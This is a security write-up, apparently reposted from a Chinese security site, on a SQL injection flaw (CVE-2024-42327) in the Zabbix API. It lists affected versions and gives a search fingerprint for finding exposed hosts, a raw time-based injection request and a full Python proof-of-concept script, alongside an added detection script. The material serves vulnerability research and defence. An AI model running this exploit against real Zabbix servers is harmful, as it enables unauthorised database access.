Zabbix SQL injection vulnerability (CVE-2024-42327) PoC

admin | 2024-12-16 13:42:40

0x00 Preface

Zabbix can monitor numerous network parameters as well as the health and integrity of servers, virtual machines, applications, services, databases, websites, cloud resources and more. Zabbix uses a flexible notification mechanism that lets users configure e-mail based alerts for practically any event, which allows a fast reaction to server problems. Zabbix also provides reporting and data visualization based on the stored data.

Affected versions:

- 6.0.0 – 6.0.31
- 6.4.0 – 6.4.16
- 7.0.0

Fofa fingerprint: app="ZABBIX-监控系统"


0x01 Vulnerability analysis & reproduction

A non-admin user account on the Zabbix frontend with the default User role, or any other role that grants API access, can exploit this vulnerability. The SQLi is in the addRelatedObjects function of the CUser class; that function is called from CUser.get, which is available to every user with API access.

Payload:

POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}
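On the defensive side, the injection point above is easy to recognise: legitimate `selectRole` entries are bare column names, while the payload smuggles SQL into one of them. The following check is an added example (not code from the original post or from the compr00t repository) that a reverse proxy or log pipeline could run over JSON-RPC request bodies to flag such `user.get` calls. The ROLE_FIELDS allowlist and the sample bodies are assumptions constructed for the example.

```python
import json
import re

# Assumed allowlist of legitimate role fields (the names used in this post's payload);
# any other selectRole entry is flagged, so keep this list in sync with your Zabbix version.
ROLE_FIELDS = {"roleid", "name", "type", "readonly"}
# A legitimate field name is a single SQL identifier: no spaces, parentheses or quotes.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def inspect_request(body: str) -> list:
    """Return findings for one JSON-RPC request body; an empty list means nothing suspicious."""
    try:
        req = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    if req.get("method") != "user.get":
        return []
    select_role = (req.get("params") or {}).get("selectRole")
    # Absent, or the API's documented "extend" shorthand: nothing user-controlled to inspect.
    if select_role is None or select_role == "extend":
        return []
    if not isinstance(select_role, list):
        return [f"selectRole has unexpected type {type(select_role).__name__}"]
    findings = []
    for field in select_role:
        if not isinstance(field, str):
            findings.append(f"selectRole entry is not a string: {field!r}")
        elif not IDENTIFIER.match(field):
            findings.append(f"selectRole entry is not a bare identifier: {field!r}")
        elif field not in ROLE_FIELDS:
            findings.append(f"selectRole entry is not a known role field: {field!r}")
    return findings


# Constructed sample bodies: the first mirrors the PoC request above, the second is a benign query.
SAMPLE_BODIES = [
    json.dumps({"jsonrpc": "2.0", "method": "user.get",
                "params": {"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
                           "userids": ["1", "2"]}, "id": 1, "auth": "<token>"}),
    json.dumps({"jsonrpc": "2.0", "method": "user.get",
                "params": {"selectRole": ["roleid", "name"], "userids": ["1"]}, "id": 2, "auth": "<token>"}),
]


def scan(bodies=SAMPLE_BODIES) -> dict:
    """Map each body's index to its findings, e.g. for a batch of captured requests."""
    return {i: inspect_request(b) for i, b in enumerate(bodies)}


if __name__ == "__main__":
    for i, findings in scan().items():
        print(f"request {i}: {'OK' if not findings else '; '.join(findings)}")
```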

PoC usage (the original post shows a screenshot here):

0x02 Vulnerability PoC

https://github.com/compr00t/CVE-2024-42327

import requests
import argparse
import time

"""
Optimized Proof of Concept for CVE-2024-42327
Author: Patrick Schmid (compr00t.bsky.social)

References:
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623

Disclaimer:
This script is provided for educational purposes only!
"""

HEADERS = {"Content-Type": "application/json"}

def get_auth_token(target, username, password):
    """Obtain a valid session token from the target."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": username, "password": password},
        "id": 1,
        "auth": None
    }

    try:
        response = requests.post(url, json=login_data, headers=HEADERS)
        response.raise_for_status()
        result = response.json().get("result")
        if result:
            print(f"[+] Session token: {result}")
            return result
        else:
            print("[-] Failed to retrieve session token. Check credentials.")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Login request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during login.")
    return None

def test_sqli(target, auth_token):
    """Test the target for SQL injection vulnerability."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    user_data = {
        "jsonrpc": "2.0",
        "method": "user.get",
        "params": {
            "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
            "userids": ["1", "2"]
        },
        "id": 1,
        "auth": auth_token
    }

    try:
        start_time = time.perf_counter()
        response = requests.post(url, json=user_data, headers=HEADERS)
        response.raise_for_status()
        elapsed_time = time.perf_counter() - start_time

        if elapsed_time < 5:
            print("[+] Response time < 5 seconds. Target is NOT vulnerable.")
        else:
            print(f"[!] Response time: {elapsed_time:.2f} seconds. Target is VULNERABLE!")
    except requests.exceptions.RequestException as e:
        print(f"[-] SQLi test request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during SQLi test.")

def main():
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2024-42327"
    )
    parser.add_argument("-t", "--target", required=True, help="The API endpoint URL.")
    parser.add_argument("-u", "--username", required=True, help="The username for authentication.")
    parser.add_argument("-p", "--password", required=True, help="The password for authentication.")

    args = parser.parse_args()

    auth_token = get_auth_token(args.target, args.username, args.password)
    if auth_token:
        test_sqli(args.target, auth_token)

if __name__ == "__main__":
    main()


Originally published on the WeChat public account 星悦安全: Zabbix SQL injection vulnerability (CVE-2024-42327)

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts no legal or joint liability. For any issues, contact us by e-mail (a corporate or otherwise valid mailbox is recommended to avoid the mail being blocked; contact details are on the home page).
Source page (CN-SEC): http://cn-sec.com/archives/3508588.html